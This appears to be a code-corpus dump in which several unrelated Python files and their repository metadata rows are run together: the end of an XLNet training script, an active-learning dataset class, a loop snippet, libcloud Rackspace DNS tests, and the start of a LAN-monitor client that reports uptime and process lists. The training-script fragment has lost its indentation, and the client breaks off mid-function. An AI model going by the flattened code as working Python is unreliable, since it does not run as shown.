device = torch.device("cpu")
n_gpu = torch.cuda.device_count()
set_seed(seed=1332, n_gpu=n_gpu)
num_epoch = num_epoch
max_grad_norm = 1.0
gradient_accumulation_steps = 50
warmup_steps = 200
tr_loss, logging_loss = 0.0, 0.0
logging_steps = 50
max_steps = -1
mlm_probability = 0.15
local_rank = -1
train_batch_size = train_batch_size
block_size = block_size
## loading tokenizer
tokenizer = TokenizerId(spm_vocab_size=spm_vocab_size)
## prepare dataset
_dataset = corpus_dir + corpus_name
if create_tokenizer:
data_list=['<unk>','<sep>', '<cls>']
with open(_dataset, encoding="utf-8") as fp:
line = fp.readline()
while line:
line = fp.readline()
data_list.append(line)
tokenizer.createVocab(data_list, spm_text_file=_dataset, data_dir=model_dir, train_spm=train_spm,
spm_max_sentence_length=spm_max_sentence_length, spm_model_name=spm_model_name,
spm_model_type=spm_model_type)
else:
tokenizer.from_pretrained(model_dir, use_spm=train_spm, spm_model_name=spm_model_name, spm_max_sentence_length=spm_max_sentence_length,
std_vocab_name=vocab_name)
print("tokenizer.vocab_size: {}".format(tokenizer.vocab_size))
## saving tokenized object for consistent use
if save_tokenized:
tokenizer.save_pretrained(model_dir, vocab_name=vocab_name)
## create cache of training dataset
train_dataset = loadAndCacheExamples(_dataset, block_size, tokenizer, evaluate=False, use_spm=train_spm)
if dotraining:
dataset = train_dataset
print("Loading train_dataset done...")
if max_steps > 0:
t_total = max_steps
else:
t_total = len(dataset) // gradient_accumulation_steps * num_epoch
print("t_total: {}".format(t_total))
config = XLNetConfig(vocab_size_or_config_json_file=tokenizer.vocab_size)
model = XLNetModel(config)
# prepare output_attentions and hidden_states
model.output_hidden_states=True
## resume iters:
if resume:
model = restoreModel(model, resume_iters=resume_iters, model_name=model_name, model_save_dir=model_dir+trained_model_savedir)
model.to(device)
num_params = 0
for p in model.parameters():
num_params += p.numel()
print(model)
print("The number of model_parameters: {}".format(num_params))
weight_decay = 0.1
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=0.00025, eps=1e-8)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=warmup_steps, t_total=t_total)
doTraining(model, config, train_dataset, tokenizer, optimizer, scheduler, tr_loss, logging_loss,
gradient_accumulation_steps, mlm_probability, device, local_rank, train_batch_size,
num_epoch=num_epoch, start_iters=resume_iters, max_grad_norm=max_grad_norm, n_gpu=n_gpu,
logging_steps=logging_steps, save_dir=model_dir+trained_model_savedir, train_model_name=train_model_name)
if __name__ == '__main__':
## Training new data
## Step-1
## set save_tokenized=True and create_tokenizer=True if you not yet do the training for tokenizers
main(corpus_dir='../../temporary_before_move_to_git/id-pytorch-transformers/samples/wiki_datasets/id/', corpus_name='combined_AE.txt', train_model_name='xlnet_id_wikicombindeAE',
model_dir='../../temporary_before_move_to_git/id-pytorch-transformers/samples/wiki_datasets/trained_model/', spm_vocab_size=20000, vocab_name='vocab_wikicombindeAE_id',
trained_model_savedir="xlnet/", spm_max_sentence_length=75000, spm_model_name='spm_wikicombindeAE_id',
dotraining=True, resume=False, train_spm=True, save_tokenized=False, create_tokenizer=False, block_size=768,
spm_model_type='unigram', train_batch_size=1, num_epoch=1000) | 43.493506 | 182 | 0.618294 |
4a2119b327d1c72230fb9d52be99d9678974f444 | 11,151 | py | Python | dataset.py | MiriamHu/ActiveBoundary | 197c0d1d0d68644e74c1fdf2534339b74990ae94 | [
"MIT"
] | 11 | 2017-10-20T14:18:17.000Z | 2021-03-16T08:52:48.000Z | dataset.py | MiriamHu/ActiveBoundary | 197c0d1d0d68644e74c1fdf2534339b74990ae94 | [
"MIT"
] | 1 | 2018-04-30T12:39:33.000Z | 2018-05-01T10:45:33.000Z | dataset.py | MiriamHu/ActiveBoundary | 197c0d1d0d68644e74c1fdf2534339b74990ae94 | [
"MIT"
] | 3 | 2017-12-02T00:14:41.000Z | 2018-04-16T15:13:25.000Z | # Taken inspiration from https://github.com/ntucllab/libact/blob/master/libact/base/dataset.py
import traceback
import numpy as np
from fuel.datasets import H5PYDataset
from sklearn import preprocessing
import os
import h5py
from utils import to_vector
__author__ = 'mhuijser'
class Dataset(object):
def __init__(self, X, y, groundtruth_y, X_val, y_val, unlabeled_class=-5, al_batch_size=1, save_path_db_points=None,
dataset=None):
"""
Dataset object that takes care of all the dataset operations and makes sure that the data is centered and has
unit variance.
:param X: numpy array with shape (n_samples, n_features)
:param y: numpy array with shape (n_samples, 1). The currently known labels.
Unlabeled samples have by default class=-5.
:param groundtruth_y: groundtruth labels. Numpy array with shape (n_samples, 1).
:param X_val: not used.
:param y_val: not used.
:param unlabeled_class: the int denoting an absent label.
:param al_batch_size: active learning batch size; the number of queries per active learning iteration.
:param save_path_db_points: Save path (dir) where the decision boundary annotations should be saved to.
:param dataset:
"""
if X.dtype not in [np.float, np.float32, np.float64] or y.dtype not in [np.float, np.float32,
np.float64] or groundtruth_y.dtype not in [
np.float, np.float32, np.float64]:
raise ValueError("Should be float")
self.unlabeled_class = unlabeled_class
self.data = {"features": X, "targets": y}
self.groundtruth_y = groundtruth_y
self.__db_points_scaled = None
if save_path_db_points is not None:
self.save_path_dbpoints_hdf5 = os.path.join(save_path_db_points,
os.path.normpath(save_path_db_points) + "_dbpoints.hdf5")
else:
self.save_path_dbpoints_hdf5 = None
self._scaling_transformation = None
self.center_and_to_unit_variance()
self._update_callback = []
self.__batch_sample = 0
self.al_batch_size = al_batch_size
self.on_update(self.check_if_batch_finished_and_center)
self.__validation_data = None
self.dataset = dataset
if X_val is not None and y_val is not None:
self.__validation_data = {"features": X_val, "targets": y_val}
def __len__(self):
return self.data["features"].shape[0]
@property
def __dimensionality__(self):
return self.data["features"].shape[1]
@property
def classes_dictionary(self):
"""
The integer labels as provided in the dataset hdf5s with the human-readable string labels.
:return:
"""
if "handbags" in self.dataset:
return {1: "handbag", 2: "shoe"}
if "svhn" in self.dataset:
return {10: "0", 8: "8"}
if "mnist" in self.dataset:
return {0: "0", 8: "8"}
else:
raise Exception("Classes dictionary not specified for current dataset!")
@property
def classes(self):
# Sorted from low to high
return np.unique(self.groundtruth_y)
def len_labeled(self):
return self.get_labeled_train_data(scaled=False)["features"].shape[0]
def len_unlabeled(self):
return self.get_unlabeled_train_data(scaled=False)["features"].shape[0]
@property
def scaling_transformation(self):
return self._scaling_transformation
@scaling_transformation.setter
def scaling_transformation(self, new_scaling_transformation):
self._scaling_transformation = new_scaling_transformation
def get_db_points(self, scaled=True):
if scaled:
if self.__db_points_scaled is None:
return None
else:
return self.__db_points_scaled.copy()
else:
return self.scaling_transformation.inverse_transform(self.__db_points_scaled)
def get_validation_data(self, scaled=True):
if scaled:
try:
return {"features": self.scaling_transformation.transform(self.__validation_data["features"]),
"targets": self.__validation_data["targets"]}
except TypeError:
return None
else:
return self.__validation_data
def get_labeled_train_data(self, scaled=True):
"""
Returns dictionary with the labeled samples, their labels and their entry ids
(index into whole data set self.data)
"features" are n_samples x n_features
"""
entry_ids, _, = np.where(self.data["targets"] != self.unlabeled_class)
if len(entry_ids) == 0:
return {"features": np.array([]), "targets": np.array([])}
if scaled:
return {"features": self.scaling_transformation.transform(self.data["features"][entry_ids][:]),
"targets": self.data["targets"][entry_ids],
"entry_ids": entry_ids}
else:
return {"features": self.data["features"][entry_ids][:],
"targets": self.data["targets"][entry_ids],
"entry_ids": entry_ids}
def get_unlabeled_train_data(self, scaled=True):
"""
Returns dictionary with the unlabeled samples and their entry ids (index into whole data set self.data)
"""
entry_ids, _, = np.where(self.data["targets"] == self.unlabeled_class)
if scaled:
return {"entry_ids": entry_ids,
"features": self.scaling_transformation.transform(self.data["features"][entry_ids][:])}
else:
return {"entry_ids": entry_ids,
"features": self.data["features"][entry_ids][:]}
def center_and_to_unit_variance(self, *args):
"""
Center the data set and the decision boundary points using the labeled train set.
:return:
"""
print "Scaling data to zero mean and unit variance..."
self.scaling_transformation = preprocessing.StandardScaler(copy=True).fit(self.data["features"])
print "Updated scaling transformation"
def check_if_batch_finished_and_center(self, *args):
self.__batch_sample += 1
if self.__batch_sample % self.al_batch_size == 0:
print "Labeling batch finished"
def add_db_point(self, db_point):
"""
Add a decision boundary annotation to the dataset.
:param db_point: decision boundary point(s) to add of shape (n_samples, n_features) in scaled space!
:return:
"""
if db_point.shape[1] != self.__dimensionality__:
raise Exception(
"Dimension mismatch. Shape[1] should be %d, not %d" % (self.__dimensionality__, db_point.shape[1]))
# In case we want this (not the default), Transform to original data space, so that it is in the same space
# as self.data["features"] and the rest of the db points
if self.__db_points_scaled is not None:
self.__db_points_scaled = np.vstack((self.__db_points_scaled, db_point))
else:
self.__db_points_scaled = db_point
print "Added new decision boundary annotation point"
if self.save_path_dbpoints_hdf5 is not None:
print "Saving decision boundary annotation point to", self.save_path_dbpoints_hdf5
self.save_db_point_to_hdf5(db_point)
def save_db_point_to_hdf5(self, db_point_scaled_space):
"""
Save a decision boundary annotation to hdf5.
:param db_point_scaled_space: (n_samples, n_features)
:return:
"""
try:
db_point_original_space = self.scaling_transformation.inverse_transform(
db_point_scaled_space) # shape (1,nlat)
if os.path.isfile(self.save_path_dbpoints_hdf5):
with h5py.File(self.save_path_dbpoints_hdf5, 'r+') as hf:
dbpoints_dataset = hf.get('db_points')
already_in_dataset = dbpoints_dataset.shape[0]
dbpoints_dataset.resize(already_in_dataset + db_point_original_space.shape[0], axis=0)
dbpoints_dataset[already_in_dataset:already_in_dataset + db_point_original_space.shape[0],
:] = db_point_original_space
split_dict = {"data": {"db_points": (0, already_in_dataset + db_point_original_space.shape[0])}}
hf.attrs["split"] = H5PYDataset.create_split_array(split_dict)
else:
# HDF5 query line save file does not exist yet!
f = h5py.File(self.save_path_dbpoints_hdf5, "w")
dbpoints_dataset = f.create_dataset('db_points', db_point_original_space.shape,
maxshape=(None, db_point_original_space.shape[1]), dtype="float32")
dbpoints_dataset[...] = db_point_original_space
split_dict = {"data": {"db_points": (0, db_point_original_space.shape[0])}}
f.attrs['split'] = H5PYDataset.create_split_array(split_dict)
f.flush()
f.close()
except Exception:
traceback.print_exc()
def update(self, entry_id, new_label, sample=None):
"""
Updates an entry with entry_id with the given label.
:param entry_id: entry id of the sample to update.
:param label: Label of the sample to be update.
"""
if isinstance(new_label, int):
new_label = np.array(new_label).reshape(1, 1)
if entry_id is None and sample is not None:
self.data["features"] = np.concatenate((self.data["features"], to_vector(sample).T), axis=0)
self.data["targets"] = np.concatenate((self.data["targets"], new_label), axis=0)
else:
self.data["targets"][entry_id] = new_label
for callback in self._update_callback:
callback(entry_id, new_label)
def on_update(self, callback):
self._update_callback.append(callback)
def format_sklearn(self):
"""
Returns dataset in (X, y) format for use in scikit-learn.
Unlabeled entries are ignored.
Returns
-------
X : numpy array, shape = (n_samples, n_features)
Sample feature set.
y : numpy array, shape = (n_samples)
Sample labels.
"""
labeled_train = self.get_labeled_train_data()
X, y = labeled_train["features"], labeled_train["targets"]
return X, y[:, 0]
def format_keras(self):
scaled_data = self.get_labeled_train_data()
return scaled_data["features"], scaled_data["targets"]
def validation_data_format_keras(self):
scaled_val = self.get_validation_data()
if scaled_val is None:
return None, None
else:
return scaled_val["features"], scaled_val["targets"]
| 43.729412 | 123 | 0.621648 |
4a211a23af47845b7045f627d8ec576dd4c6cb2a | 118 | py | Python | snippets/for-loop-sample.py | coshkun/6.00.1x-MITx-Course-Training-Lab-Notes | 63e755dc81fd50a7b1372074a4a73e50021a233b | [
"MIT"
] | null | null | null | snippets/for-loop-sample.py | coshkun/6.00.1x-MITx-Course-Training-Lab-Notes | 63e755dc81fd50a7b1372074a4a73e50021a233b | [
"MIT"
] | null | null | null | snippets/for-loop-sample.py | coshkun/6.00.1x-MITx-Course-Training-Lab-Notes | 63e755dc81fd50a7b1372074a4a73e50021a233b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Feb 11 19:39:13 2017
@author: coskun
"""
for n in range(5):
print(n)
| 11.8 | 35 | 0.567797 |
4a211a3f85880e582ba86d983d8a960f411ad10a | 20,348 | py | Python | libcloud/test/dns/test_rackspace.py | vanclevstik/libcloud | 2d58fa9ed4defec7f44ce0b83aede701dbc806e1 | [
"Apache-2.0"
] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | libcloud/test/dns/test_rackspace.py | elastacloud/libcloud | f3792b2dca835c548bdbce0da2eb71bfc9463b72 | [
"Apache-2.0"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | libcloud/test/dns/test_rackspace.py | elastacloud/libcloud | f3792b2dca835c548bdbce0da2eb71bfc9463b72 | [
"Apache-2.0"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
import sys
import unittest
from libcloud.utils.py3 import httplib
from libcloud.common.types import LibcloudError
from libcloud.dns.types import RecordType, ZoneDoesNotExistError
from libcloud.dns.types import RecordDoesNotExistError
from libcloud.dns.drivers.rackspace import RackspaceUSDNSDriver
from libcloud.dns.drivers.rackspace import RackspaceUKDNSDriver
from libcloud.test import MockHttp
from libcloud.test.file_fixtures import DNSFileFixtures
from libcloud.test.secrets import DNS_PARAMS_RACKSPACE
class RackspaceUSTests(unittest.TestCase):
klass = RackspaceUSDNSDriver
endpoint_url = 'https://dns.api.rackspacecloud.com/v1.0/11111'
def setUp(self):
self.klass.connectionCls.conn_classes = (
None, RackspaceMockHttp)
RackspaceMockHttp.type = None
self.driver = self.klass(*DNS_PARAMS_RACKSPACE)
self.driver.connection.poll_interval = 0.0
# normally authentication happens lazily, but we force it here
self.driver.connection._populate_hosts_and_request_paths()
def test_force_auth_token_kwargs(self):
kwargs = {
'ex_force_auth_token': 'some-auth-token',
'ex_force_base_url': 'https://dns.api.rackspacecloud.com/v1.0/11111'
}
driver = self.klass(*DNS_PARAMS_RACKSPACE, **kwargs)
driver.list_zones()
self.assertEqual(kwargs['ex_force_auth_token'],
driver.connection.auth_token)
self.assertEqual('/v1.0/11111',
driver.connection.request_path)
def test_force_auth_url_kwargs(self):
kwargs = {
'ex_force_auth_version': '2.0',
'ex_force_auth_url': 'https://identity.api.rackspace.com'
}
driver = self.klass(*DNS_PARAMS_RACKSPACE, **kwargs)
self.assertEqual(kwargs['ex_force_auth_url'],
driver.connection._ex_force_auth_url)
self.assertEqual(kwargs['ex_force_auth_version'],
driver.connection._auth_version)
def test_gets_auth_2_0_endpoint(self):
kwargs = {'ex_force_auth_version': '2.0_password'}
driver = self.klass(*DNS_PARAMS_RACKSPACE, **kwargs)
driver.connection._populate_hosts_and_request_paths()
self.assertEquals(self.endpoint_url, driver.connection.get_endpoint())
def test_list_record_types(self):
record_types = self.driver.list_record_types()
self.assertEqual(len(record_types), 8)
self.assertTrue(RecordType.A in record_types)
def test_list_zones_success(self):
zones = self.driver.list_zones()
self.assertEqual(len(zones), 6)
self.assertEqual(zones[0].domain, 'foo4.bar.com')
self.assertEqual(zones[0].extra['comment'], 'wazaaa')
def test_list_zones_http_413(self):
RackspaceMockHttp.type = '413'
try:
self.driver.list_zones()
except LibcloudError:
pass
else:
self.fail('Exception was not thrown')
def test_list_zones_no_results(self):
RackspaceMockHttp.type = 'NO_RESULTS'
zones = self.driver.list_zones()
self.assertEqual(len(zones), 0)
def test_list_records_success(self):
zone = self.driver.list_zones()[0]
records = self.driver.list_records(zone=zone)
self.assertEqual(len(records), 3)
self.assertEqual(records[0].name, 'test3')
self.assertEqual(records[0].type, RecordType.A)
self.assertEqual(records[0].data, '127.7.7.7')
self.assertEqual(records[0].extra['ttl'], 777)
self.assertEqual(records[0].extra['comment'], 'lulz')
self.assertEqual(records[0].extra['fqdn'], 'test3.%s' %
(records[0].zone.domain))
def test_list_records_no_results(self):
zone = self.driver.list_zones()[0]
RackspaceMockHttp.type = 'NO_RESULTS'
records = self.driver.list_records(zone=zone)
self.assertEqual(len(records), 0)
def test_list_records_zone_does_not_exist(self):
zone = self.driver.list_zones()[0]
RackspaceMockHttp.type = 'ZONE_DOES_NOT_EXIST'
try:
self.driver.list_records(zone=zone)
except ZoneDoesNotExistError:
e = sys.exc_info()[1]
self.assertEqual(e.zone_id, zone.id)
else:
self.fail('Exception was not thrown')
def test_get_zone_success(self):
RackspaceMockHttp.type = 'GET_ZONE'
zone = self.driver.get_zone(zone_id='2946063')
self.assertEqual(zone.id, '2946063')
self.assertEqual(zone.domain, 'foo4.bar.com')
self.assertEqual(zone.type, 'master')
self.assertEqual(zone.extra['email'], '[email protected]')
def test_get_zone_does_not_exist(self):
RackspaceMockHttp.type = 'DOES_NOT_EXIST'
try:
self.driver.get_zone(zone_id='4444')
except ZoneDoesNotExistError:
e = sys.exc_info()[1]
self.assertEqual(e.zone_id, '4444')
else:
self.fail('Exception was not thrown')
def test_get_record_success(self):
record = self.driver.get_record(zone_id='12345678',
record_id='23456789')
self.assertEqual(record.id, 'A-7423034')
self.assertEqual(record.name, 'test3')
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.extra['comment'], 'lulz')
def test_get_record_zone_does_not_exist(self):
RackspaceMockHttp.type = 'ZONE_DOES_NOT_EXIST'
try:
self.driver.get_record(zone_id='444', record_id='28536')
except ZoneDoesNotExistError:
pass
else:
self.fail('Exception was not thrown')
def test_get_record_record_does_not_exist(self):
RackspaceMockHttp.type = 'RECORD_DOES_NOT_EXIST'
try:
self.driver.get_record(zone_id='12345678',
record_id='28536')
except RecordDoesNotExistError:
pass
else:
self.fail('Exception was not thrown')
def test_create_zone_success(self):
RackspaceMockHttp.type = 'CREATE_ZONE'
zone = self.driver.create_zone(domain='bar.foo1.com', type='master',
ttl=None,
extra={'email': '[email protected]'})
self.assertEqual(zone.id, '2946173')
self.assertEqual(zone.domain, 'bar.foo1.com')
self.assertEqual(zone.type, 'master')
self.assertEqual(zone.extra['email'], '[email protected]')
def test_create_zone_validaton_error(self):
RackspaceMockHttp.type = 'CREATE_ZONE_VALIDATION_ERROR'
try:
self.driver.create_zone(domain='foo.bar.com', type='master',
ttl=10,
extra={'email': '[email protected]'})
except Exception:
e = sys.exc_info()[1]
self.assertEqual(str(e), 'Validation errors: Domain TTL is ' +
'required and must be greater than ' +
'or equal to 300')
else:
self.fail('Exception was not thrown')
def test_update_zone_success(self):
zone = self.driver.list_zones()[0]
updated_zone = self.driver.update_zone(zone=zone,
extra={'comment':
'bar foo'})
self.assertEqual(zone.extra['comment'], 'wazaaa')
self.assertEqual(updated_zone.id, zone.id)
self.assertEqual(updated_zone.domain, 'foo4.bar.com')
self.assertEqual(updated_zone.type, zone.type)
self.assertEqual(updated_zone.ttl, zone.ttl)
self.assertEqual(updated_zone.extra['comment'], 'bar foo')
def test_update_zone_domain_cannot_be_changed(self):
zone = self.driver.list_zones()[0]
try:
self.driver.update_zone(zone=zone, domain='libcloud.org')
except LibcloudError:
pass
else:
self.fail('Exception was not thrown')
def test_create_record_success(self):
zone = self.driver.list_zones()[0]
RackspaceMockHttp.type = 'CREATE_RECORD'
record = self.driver.create_record(name='www', zone=zone,
type=RecordType.A, data='127.1.1.1')
self.assertEqual(record.id, 'A-7423317')
self.assertEqual(record.name, 'www')
self.assertEqual(record.zone, zone)
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, '127.1.1.1')
self.assertEqual(record.extra['fqdn'], 'www.%s' % (zone.domain))
def test_update_record_success(self):
zone = self.driver.list_zones()[0]
record = self.driver.list_records(zone=zone)[0]
updated_record = self.driver.update_record(record=record,
data='127.3.3.3')
self.assertEqual(record.name, 'test3')
self.assertEqual(record.data, '127.7.7.7')
self.assertEqual(updated_record.id, record.id)
self.assertEqual(updated_record.name, record.name)
self.assertEqual(updated_record.zone, record.zone)
self.assertEqual(updated_record.type, record.type)
self.assertEqual(updated_record.data, '127.3.3.3')
def test_delete_zone_success(self):
zone = self.driver.list_zones()[0]
status = self.driver.delete_zone(zone=zone)
self.assertTrue(status)
def test_delete_zone_does_not_exist(self):
zone = self.driver.list_zones()[0]
RackspaceMockHttp.type = 'ZONE_DOES_NOT_EXIST'
try:
self.driver.delete_zone(zone=zone)
except ZoneDoesNotExistError:
e = sys.exc_info()[1]
self.assertEqual(e.zone_id, zone.id)
else:
self.fail('Exception was not thrown')
def test_delete_record_success(self):
zone = self.driver.list_zones()[0]
record = self.driver.list_records(zone=zone)[0]
status = self.driver.delete_record(record=record)
self.assertTrue(status)
def test_delete_record_does_not_exist(self):
zone = self.driver.list_zones()[0]
record = self.driver.list_records(zone=zone)[0]
RackspaceMockHttp.type = 'RECORD_DOES_NOT_EXIST'
try:
self.driver.delete_record(record=record)
except RecordDoesNotExistError:
e = sys.exc_info()[1]
self.assertEqual(e.record_id, record.id)
else:
self.fail('Exception was not thrown')
def test_to_full_record_name_name_provided(self):
domain = 'foo.bar'
name = 'test'
self.assertEqual(self.driver._to_full_record_name(domain, name),
'test.foo.bar')
def test_to_full_record_name_name_not_provided(self):
domain = 'foo.bar'
name = None
self.assertEqual(self.driver._to_full_record_name(domain, name),
'foo.bar')
def test_to_partial_record_name(self):
domain = 'example.com'
names = ['test.example.com', 'foo.bar.example.com',
'example.com.example.com', 'example.com']
expected_values = ['test', 'foo.bar', 'example.com', None]
for name, expected_value in zip(names, expected_values):
value = self.driver._to_partial_record_name(domain=domain,
name=name)
self.assertEqual(value, expected_value)
class RackspaceUKTests(RackspaceUSTests):
klass = RackspaceUKDNSDriver
endpoint_url = 'https://lon.dns.api.rackspacecloud.com/v1.0/11111'
class RackspaceMockHttp(MockHttp):
fixtures = DNSFileFixtures('rackspace')
base_headers = {'content-type': 'application/json'}
def _v2_0_tokens(self, method, url, body, headers):
body = self.fixtures.load('auth_2_0.json')
headers = {
'content-type': 'application/json'
}
return (httplib.OK, body, headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains(self, method, url, body, headers):
body = self.fixtures.load('list_zones_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_413(self, method, url, body, headers):
body = ''
return (httplib.REQUEST_ENTITY_TOO_LARGE, body, self.base_headers,
httplib.responses[httplib.REQUEST_ENTITY_TOO_LARGE])
def _v1_0_11111_domains_NO_RESULTS(self, method, url, body, headers):
body = self.fixtures.load('list_zones_no_results.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('list_records_success.json')
elif method == 'PUT':
# Async - update_zone
body = self.fixtures.load('update_zone_success.json')
elif method == 'DELETE':
# Aync - delete_zone
body = self.fixtures.load('delete_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_NO_RESULTS(self, method, url, body,
headers):
body = self.fixtures.load('list_records_no_results.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_ZONE_DOES_NOT_EXIST(self, method, url,
body, headers):
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _v1_0_11111_domains_2946063_GET_ZONE(self, method, url, body, headers):
body = self.fixtures.load('get_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_4444_DOES_NOT_EXIST(self, method, url, body,
headers):
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _v1_0_11111_domains_12345678(self, method, url, body, headers):
body = self.fixtures.load('get_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_12345678_records_23456789(self, method, url, body,
headers):
body = self.fixtures.load('get_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_444_ZONE_DOES_NOT_EXIST(self, method, url, body,
headers):
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _v1_0_11111_domains_12345678_RECORD_DOES_NOT_EXIST(self, method, url,
body, headers):
body = self.fixtures.load('get_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_12345678_records_28536_RECORD_DOES_NOT_EXIST(self, method, url, body, headers):
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _v1_0_11111_domains_CREATE_ZONE(self, method, url, body, headers):
# Async response - create_zone
body = self.fixtures.load('create_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_288795f9_e74d_48be_880b_a9e36e0de61e_CREATE_ZONE(self, method, url, body, headers):
# Async status - create_zone
body = self.fixtures.load('create_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_CREATE_ZONE_VALIDATION_ERROR(self, method, url, body, headers):
body = self.fixtures.load('create_zone_validation_error.json')
return (httplib.BAD_REQUEST, body, self.base_headers,
httplib.responses[httplib.BAD_REQUEST])
def _v1_0_11111_status_116a8f17_38ac_4862_827c_506cd04800d5(self, method, url, body, headers):
# Aync status - update_zone
body = self.fixtures.load('update_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_586605c8_5739_43fb_8939_f3a2c4c0e99c_CREATE_RECORD(self, method, url, body, headers):
# Aync status - create_record
body = self.fixtures.load('create_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_records_CREATE_RECORD(self, method, url, body, headers):
# Aync response - create_record
body = self.fixtures.load('create_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_251c0d0c_95bc_4e09_b99f_4b8748b66246(self, method, url, body, headers):
# Aync response - update_record
body = self.fixtures.load('update_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_records_A_7423034(self, method, url, body,
headers):
# Aync response - update_record
body = self.fixtures.load('update_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_0b40cd14_2e5d_490f_bb6e_fdc65d1118a9(self, method,
url, body,
headers):
# Async status - delete_zone
body = self.fixtures.load('delete_zone_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_status_0b40cd14_2e5d_490f_bb6e_fdc65d1118a9_RECORD_DOES_NOT_EXIST(self, method, url, body, headers):
# Async status - delete_record
body = self.fixtures.load('delete_record_success.json')
return (httplib.OK, body, self.base_headers,
httplib.responses[httplib.OK])
def _v1_0_11111_domains_2946063_records_A_7423034_RECORD_DOES_NOT_EXIST(self, method, url, body, headers):
# Async response - delete_record
body = self.fixtures.load('does_not_exist.json')
return (httplib.NOT_FOUND, body, self.base_headers,
httplib.responses[httplib.NOT_FOUND])
if __name__ == '__main__':
sys.exit(unittest.main())
| 41.441955 | 120 | 0.634313 |
4a211b0a0a86b839a1c143a0bb84b14382d06861 | 3,457 | py | Python | client/client.py | wrighteagle2d/lanmonitor | 823b65257be9548785bc2bb94c28cd6df2d92a8e | [
"BSD-2-Clause"
] | 3 | 2017-10-12T02:27:07.000Z | 2019-08-06T03:04:51.000Z | client/client.py | wrighteagle2d/lanmonitor | 823b65257be9548785bc2bb94c28cd6df2d92a8e | [
"BSD-2-Clause"
] | null | null | null | client/client.py | wrighteagle2d/lanmonitor | 823b65257be9548785bc2bb94c28cd6df2d92a8e | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import re
import os
import time
import socket
import commands
host = "192.168.26.160"
port = 50000
server_count = 0
team_name_map = {
re.compile("WE20"): "WrightEagle",
re.compile("WrightEagle"): "WrightEagle",
re.compile("helios_"): "Helios",
re.compile("nq"): "LsuAmoyNQ",
re.compile("oxsy"): "Oxsy",
re.compile("BS2kAgent"): "BrainStormers",
re.compile("SputCoach"): "BrainStormers",
re.compile("NemesisAgent"): "Nemesis",
re.compile("sample_"): "Agent2D",
re.compile("marlik_"): "Marlik",
re.compile("ESKILAS"): "Eskilas"
}
def build_message():
message = ""
message += uptime()
message += process_status()
message += test_info()
return message
def uptime():
return commands.getoutput("uptime").strip()
def process_status():
global server_count
server_name = "rcssserver"
server_user = ""
server_count = 0
process_list = commands.getoutput("ps -e -o comm,user=").strip().split("\n")
process_list.pop(0)
team_count_map = {}
cmd_count_map = {}
matched_cmds = {}
for process in process_list:
info = process.split()
(cmd, user) = (info[0], info[1])
cmd_count_map[cmd] = 1 + cmd_count_map.get(cmd, 0)
for pattern in team_name_map.keys():
if pattern.match(cmd):
matched_cmds[cmd] = 1
team_name = team_name_map[pattern]
team_count_map[team_name] = 1 + team_count_map.get(team_name, 0)
break
if not server_user and cmd == server_name:
server_user = user
if cmd_count_map.has_key(server_name):
server_count = cmd_count_map[server_name]
message = ""
